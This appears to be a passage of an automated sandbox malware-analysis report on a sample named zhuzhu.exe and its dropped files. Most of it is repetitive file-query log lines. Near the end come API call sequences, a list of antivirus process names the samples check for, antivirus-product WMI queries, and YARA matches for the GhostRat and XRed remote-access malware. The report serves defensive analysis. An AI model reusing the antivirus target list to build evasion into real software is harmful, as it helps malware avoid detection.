                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_100113E9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_100113E9
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001B8A46 _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,7_2_001B8A46
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03785D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_03785D22
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,4_2_03776A70
                                      Source: ._cache_zhuzhu.exeBinary or memory string: vsserv.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: avcenter.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: cfp.exe
                                      Source: inst.exeBinary or memory string: SuperKiller.exe
                                      Source: Amcache.hve.22.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                      Source: Amcache.hve.22.drBinary or memory string: msmpeng.exe
                                      Source: Amcache.hve.22.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: rtvscan.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: TMBMSRV.exe
                                      Source: inst.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360Safe.exe
                                      Source: inst.exeBinary or memory string: \SuperKiller.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: avgwdsvc.exe
                                      Source: inst.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                      Source: inst.exeBinary or memory string: firstaid\superkiller.exe
                                      Source: inst.exeBinary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                      Source: Amcache.hve.22.drBinary or memory string: MsMpEng.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: K7TSecurity.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: acs.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: kxetray.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: KSafeTray.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: avp.exe
                                      Source: inst.exeBinary or memory string: 360safe.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: 360Safe.exe
                                      Source: inst.exeBinary or memory string: 360tray.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: ashDisp.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: 360Tray.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: AYAgent.aye
                                      Source: ._cache_zhuzhu.exeBinary or memory string: RavMonD.exe
                                      Source: ._cache_zhuzhu.exeBinary or memory string: QUHLPSVC.EXE
                                      Source: ._cache_zhuzhu.exeBinary or memory string: Mcshield.exe
                                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                      Stealing of Sensitive Information

                                      barindex
                                      Yara detected GhostRat
                                      Source: Yara matchFile source: Process Memory Space: ._cache_zhuzhu.exe PID: 6340, type: MEMORYSTR
                                      Yara detected XRed
                                      Source: Yara matchFile source: zhuzhu.exe, type: SAMPLE
                                      Source: Yara matchFile source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: zhuzhu.exe PID: 6652, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5780, type: MEMORYSTR
                                      Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE77E.tmp, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                      Queries disk data (e.g. SMART data)
                                      Source: C:\Users\user\Downloads\inst.exeDevice IO: \Device\Harddisk0\DR0
                                      Source: C:\Users\user\Downloads\inst.exeDevice IO: \Device\Harddisk0\DR0

                                      Remote Access Functionality

                                      barindex
                                      Yara detected GhostRat
                                      Source: Yara matchFile source: Process Memory Space: ._cache_zhuzhu.exe PID: 6340, type: MEMORYSTR
                                      Yara detected XRed
                                      Source: Yara matchFile source: zhuzhu.exe, type: SAMPLE
                                      Source: Yara matchFile source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: zhuzhu.exe PID: 6652, type: MEMORYSTR
